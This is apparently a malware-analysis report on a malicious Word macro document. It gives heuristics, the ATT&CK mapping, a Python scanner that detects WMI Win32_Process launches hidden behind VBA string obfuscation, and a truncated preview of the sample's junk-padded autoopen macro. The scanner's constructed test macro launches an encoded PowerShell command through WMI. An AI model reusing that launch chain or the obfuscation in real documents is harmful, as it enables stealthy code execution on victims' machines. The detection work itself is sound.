Verdict: MALICIOUS (Risk Score 282)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
T1190 Exploit Public-Facing Application
The critical heuristic VBA WMI Win32_Process launcher fired: the VBA macro builds a WMI moniker for Win32_Process and calls .Create to start a command. A process started this way is spawned by the WMI provider host (WmiPrvSE.exe) rather than as a child of WINWORD.EXE, which sidesteps detections that key on an Office process launching cmd.exe or powershell.exe directly. The AutoOpen macro and the legacy WordBasic auto-exec marker show the chain runs as soon as the document is opened with macros enabled. The macro source is padded with junk arithmetic and conditional blocks on uninitialized variables (see the preview below), and nothing in it ties the sample to a named family, so it is classified as 'unknown family' despite the ClamAV signature hit.
Heuristics (8)

- ClamAV: Doc.Malware.Sagent-6941569-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Sagent-6941569-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE): VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
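The WMI launcher heuristic above notes that macros usually hide the moniker and class name behind string building. The following is an added example, not the analyzer's own rule logic and not code from the sample: a small scanner that first folds the simplest VBA string tricks (literal concatenation with & or +, Chr()/ChrW()/Chr$() calls, StrReverse on a literal) into plain literals and only then searches for the winmgmts: moniker, the Win32_Process class and the .Create call, and recovers the command line passed to .Create. Both VBA snippets are constructed for this example, and the rule IDs in the output are reused as labels only.

```python
# Added example (not the analyzer's rules, not code from the sample):
# normalize simple VBA string obfuscation, then detect the
# GetObject("winmgmts:...").Get("Win32_Process").Create(...) launch chain.
import re

# Constructed sample: the launch chain with every key string split or encoded.
SAMPLE_OBFUSCATED = r'''
Sub autoopen()
    Dim o As Object, p As Object, pid As Long
    Set o = GetObject("win" & "mgmts:" & "{impersonationLevel=impersonate}!\\.\root\cimv2")
    Set p = o.Get(StrReverse("ssecorP_23niW"))
    p.Create "cmd.exe /c " & Chr(112) & Chr(111) & "wershell -enc AAAA", Null, Null, pid
End Sub
'''

# Constructed sample: auto-exec macro that only touches document formatting.
SAMPLE_BENIGN = r'''
Sub AutoOpen()
    ActiveDocument.Paragraphs(1).Range.Font.Bold = True
End Sub
'''

_CHR_RE = re.compile(r'\bChr[WB$]?\(\s*(\d+)\s*\)', re.IGNORECASE)
_STRREV_RE = re.compile(r'\bStrReverse\(\s*"([^"]*)"\s*\)', re.IGNORECASE)
_CONCAT_RE = re.compile(r'"\s*[&+]\s*"')          # "abc" & "def"  ->  "abcdef"
_AUTOEXEC_RE = re.compile(
    r'\bSub\s+(AutoOpen|Document_Open|AutoExec|Auto_Open|Workbook_Open)\b',
    re.IGNORECASE)
_WMI_RE = {
    "moniker": re.compile(r'winmgmts:', re.IGNORECASE),
    "class": re.compile(r'Win32_Process\b', re.IGNORECASE),
    "create": re.compile(r'\.Create\b', re.IGNORECASE),
}
_CREATE_ARG_RE = re.compile(r'\.Create\s*\(?\s*"([^"]*)"', re.IGNORECASE)


def _chr_to_literal(m):
    ch = chr(int(m.group(1)))
    if ch == '"' or not ch.isprintable():   # never break a literal boundary
        return m.group(0)
    return '"' + ch + '"'


def normalize_vba(src):
    """Fold Chr()/StrReverse() on literals and literal concatenation into plain literals."""
    out = _CHR_RE.sub(_chr_to_literal, src)
    out = _STRREV_RE.sub(lambda m: '"' + m.group(1)[::-1] + '"', out)
    prev = None
    while prev != out:                       # joins cascade: "a" & "b" & "c"
        prev = out
        out = _CONCAT_RE.sub('', out)
    return out


def scan_vba(src):
    """Return the findings the normalized macro source supports."""
    norm = normalize_vba(src)
    parts = {k: bool(rx.search(norm)) for k, rx in _WMI_RE.items()}
    findings = []
    if _AUTOEXEC_RE.search(norm):
        findings.append("OLE_VBA_AUTOOPEN")
    if all(parts.values()):                  # moniker + class + .Create together
        findings.append("OLE_VBA_WMI_PROCESS_CREATE")
    m = _CREATE_ARG_RE.search(norm) if parts["create"] else None
    return {
        "findings": findings,
        "wmi_parts": parts,
        "command": m.group(1) if m else None,
    }


if __name__ == "__main__":
    for name, src in (("obfuscated", SAMPLE_OBFUSCATED), ("benign", SAMPLE_BENIGN)):
        print(name, scan_vba(src))
```

Requiring all three parts (moniker, class, .Create) keeps a lone "Win32_Process" literal from firing, which matters because the class name also appears in benign inventory scripts. The normalization only handles strings built from literals; a macro that assembles the class name in a helper function or from p-code-only modules defeats it, which is why the p-code token heuristic and dynamic analysis remain the fallback for samples like the padded one previewed below.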
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 58644 bytes |

SHA-256: 5ec2e7ec9f89835f25bd6e626bbe9942384bfce1652df0c82a2533a074c7439f

Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "RABBAAU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "ZADAB4AQ"
Attribute VB_Base = "0{98AA738E-8DCC-40F6-968A-606F76234379}{E1F289D6-B007-4E6C-8FDB-6E4523011A5F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "bQxDDA"
Attribute VB_Base = "0{5BF04F59-34A9-4787-A884-216B16A4E79B}{028B6BD1-D077-445E-8D93-3E65E3422A17}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "DGXUACA"
Sub autoopen()
If XDQoD_ = rQwoAAA Then
Select Case uGcCcXU
Case 412484586
I1U4AG = 531440149
mAGwAcAB = hAAAZA
FZAA_AD = Asc(387780501 + Log(268599846 - Rnd(DXX4xABw)) / 427752754 + Oct(717735401))
Case 976129143
o1GXA_X = JAUABAA
kQAQC_1U = BAQkABUX
iAA4Ux = CDate(776495311 - Cos(879223162 * Rnd(225647713) + 54910069 * 222724604) * r11AwDw / Round(899741393))
Case 326242996
QAU11w = rGwAo1
jAXkAGQC = CStr(858213074)
IBB1AZ = Atn(667093089 + Atn(303481066) * ZBcoDZA * CDate(VAUAB_A + 36 + j1_AADx / CStr(UAUXcXAX)))
End Select
End If
If LAQBUAAZ = wAGAD1B Then
Select Case sQAADkC
Case 84677044
zAxX1ZA1 = 658719516
qAk1AACQ = XoAD1cA_
mQQQACBD = Asc(931731990 + Log(897995842 - Rnd(ZQAokQ1U)) / 3788671 + Oct(538819238))
Case 88761606
WBAxQAA = AAk4CB
fUBQDUA = UXDAXUAA
BDUAXx = CDate(264814098 - Cos(769216138 * Rnd(180297) + 755663669 * 530305566) * aAAGAcA / Round(456096298))
Case 498573554
s4BZAAGQ = swwAAQk4
QAQBAAx = CStr(188419521)
hQAGQBAQ = Atn(948971452 + Atn(656060709) * bGGXUC4_ * CDate(JCDABUAQ + 36 + ZwkA_QC / CStr(RGGBA1)))
End Select
End If
If TBUAAZ = iDAAw_1A Then
Select Case GAQAAAAc
Case 953039793
SBAAGQxA = 92290036
t1AQQAZ = CowcDQAA
hQDcwZA = Asc(893219596 + Log(571779121 - Rnd(bBZGAZ)) / 372244 + Oct(408448808))
Case 4093032
TUA_41A = FBGBAZ1A
cAGQZA = KAAZoA
zXAoDc = CDate(443886480 - Cos(120686030 * Rnd(153428062) + 695824283 * 166147075) * iXBUoCBU / Round(863695897))
Case 285231789
wUDA4CAG = FGAQB_Q
tDQQBAkx = CStr(994343949)
GAAcU1D = Atn(56046593 + Atn(563662184) * wxADAwk * CDate(IZ_BAA + 36 + v_AAkA / CStr(SADAkZ)))
End Select
End If
CxQcUZA
If uAxADcBA = McQAoA Then
Select Case GkU4Ux
Case 104975783
lA4ZkA1 = 725148149
LABAcCA1 = v1A4AAAA
ACA4BA = Asc(330709001 + Log(773993732 - Rnd(MDc1AAQZ)) / 426081966 + Oct(646181733))
Case 226174800
A_AAx4AD = hAAxcAA
JBBBAZA = ioGA1AAk
QA1QAG = CDate(327090497 - Cos(567849335 * Rnd(79000618) + 792454684 * 557286600) * BBQkAAk / Round(320938827))
Case 772409821
ZDQ4_x = UZ1wAQAX
I1wA1AXA = CStr(131211332)
PxQAw1A = Atn(899991348 + Atn(721291585) * CG1kA4 * CDate(E_kU4wB + 36 + GUAoAUD_ / CStr(j_AAABD)))
End Select
End If
If EDAA4BA = AXBAAGAc Then
Select Case BAAXcoA
Case 158165350
pAGABX = 816896992
kkACAA = r1AXxD
ZAo1UUU = Asc(82172726 + Log(52699891 - Rnd(aAoooxAZ)) / 268907725 + Oct(785052912))
Case 964769127
nUDBxxQA = DBAAGx
... (truncated)